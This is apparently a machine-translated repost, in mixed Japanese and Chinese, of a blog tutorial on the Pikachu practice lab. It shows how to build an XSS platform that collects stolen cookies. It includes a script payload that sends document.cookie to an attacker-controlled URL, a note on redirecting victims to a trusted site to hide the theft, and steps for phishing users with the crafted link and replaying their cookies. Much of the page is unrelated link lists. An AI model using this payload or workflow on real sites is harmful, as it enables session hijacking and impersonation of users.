ビルドと取得クッキーにクロスサイトスクリプティングのXSS攻撃のXSSプラットフォーム

その他 2020-04-08 00:42:36 訪問数: null

ビルドと取得クッキーにXSSプラットフォーム

準備

利用pikachuXSS后台
	pikachu\pkxss\inc目录下的config.inc.php
		修改mysql用户名密码
			登录后台

ピカチュウ\ pkxss \ xcookie解釈ディレクトリ

	cookie.php
		获取cookie的API页面并存到攻击者平台数据库中
			获取完后才能重定向一个可信网站，起到迷惑用户隐藏攻击过程的作用
	pkxss_cookie_result.php
		对应攻击者后台页面

オペレーティング

ペイロード

<script>document.location = 'http://192.168.0.101/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

				//通过document.location 实例进行重定向到http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?cookie=

具体的なアイデア

在公网上搭建一个平台
		在有输入参数的地方写入payload
			构造一个写入了payload的xss地址
				把这个URL地址发给用户 
					用户收到地址后点击地址，cookie就被窃取到攻击者搭建好的平台
						攻击者拿到用户的cookie之后
							通过抓包修改cookie就可以以用户的身份来访问网站了

ジェントルシャオシュエ

公開された80元の記事・ウォンの賞賛8 ・ビュー4235

プライベートの手紙の懸念

おすすめ

転載: blog.csdn.net/weixin_43079958/article/details/105336243

ビルドと取得クッキーにクロスサイトスクリプティングのXSS攻撃のXSSプラットフォーム

XSS XSSのクロスサイトスクリプティング攻撃のgetキーロガー

反射型XSS XSSのクロスサイトスクリプティング攻撃（ポスト）は、ユーザーのパスワードを取得します

クロスサイトスクリプティングのXSS攻撃XSS Mangda

[ネットワーク攻撃と防御]「クロスサイトスクリプティング攻撃」最初の箇条書き-反映されたXSS

ネットワークセキュリティ：XSSのクロスサイトスクリプティング攻撃

DVWAのXSSクロスサイトスクリプティング攻撃（ストレージタイプ）

クロスサイトスクリプティングの脆弱性のためのベースのXSSピカチュウプラットフォーム

20170812-XSSのクロスサイトスクリプティング攻撃

XSSのクロスサイトスクリプティング攻撃

クロスサイトスクリプティングのXSS攻撃のXSSテスト釣り

XSS攻撃（クロスサイトスクリプティング攻撃）

Webセキュリティ攻撃と守備の学習--08-（Webリンクを改ざんバイパスSQLインジェクション、XSSのクロスサイトスクリプティングの分類、使用クッキーセッションハイジャック、XSS）

XSS（クロスサイトスクリプティング攻撃）の原則と使用

XSS--クロスサイトスクリプティング攻撃

XSS_クロスサイトスクリプティング攻撃

ソフトウェアのセキュリティ--xssクロスサイトスクリプティング攻撃

いくつかの注意（XSSのクロスサイトスクリプティング攻撃）

Web 攻撃と防御のためのビジネスセキュリティ: コールバックカスタムテスト (トリガー XSS 脆弱性)

XSS XSSのクロスサイトスクリプティング攻撃の安全保障と防衛のアイデア

クロスサイト攻撃 XSS、クロスサイトスクリプティング

DVWAのXSSクロスサイトスクリプティング攻撃（リフレクションタイプ）

XSSクロスサイトスクリプティング攻撃と予防策

[特急] マルチビューストリーミングメディア、著名人を伴うライブストリーミングテクノロジー、Kingsoft Cloud ライブストリーミングアーキテクチャとクラウドディレクタープラットフォームの進化...

ビルドにXSSのテストプラットフォーム

PHPのセキュリティ分野とクロスサイトスクリプティングのXSSフィルタ機能を防ぐために

マイクロサービスのアーキテクチャをインストール------ Ubuntu Linuxのプラットフォームのエピソード

[ネットワークセキュリティ]-サーバー側のセキュリティ（インジェクション攻撃、認証とセッションの管理とアクセス制御、アクセス制御、暗号化アルゴリズムと乱数、Webフレームワークのセキュリティ、アプリケーション層のサービス拒否攻撃DDOSなど）

Nginxリバースプロキシサービスクラスターロードバランシングに基づく.netコアクロスプラットフォーム開発マイクロサービスアーキテクチャ

スプリングブート防御はクロスサイトスクリプティング (XSS) 攻撃です

おすすめ

中国人プログラマーの「35歳の呪い」

Lanya CorelDRAW プラグイン 2024.5.1 国際労働者の日バージョン、無料ダウンロード

ランキング

ループコントローラ

スピーカーの分類（スピーカーDiarisation）

雑音除去空気とフロートを除去するための統計的フィルタリング方法を使用して

Spring Cloudプロジェクトの構築（5）

Echarts去掉图形后面的网格线

【レジャー・楽しみ】C言語でクリスマスツリーを描く方法

ゲームが反映するように、後に＃589（本部2）ラウンドCodeforces

アレイの重複排除について知っているソリューションはいくつありますか？

NetBackupの証明書の有効期限は-nBuエラー8506に近づきます

Dockerコンテナの起動パラメータを表示する

アーカイブ

もっと

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(35)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(31)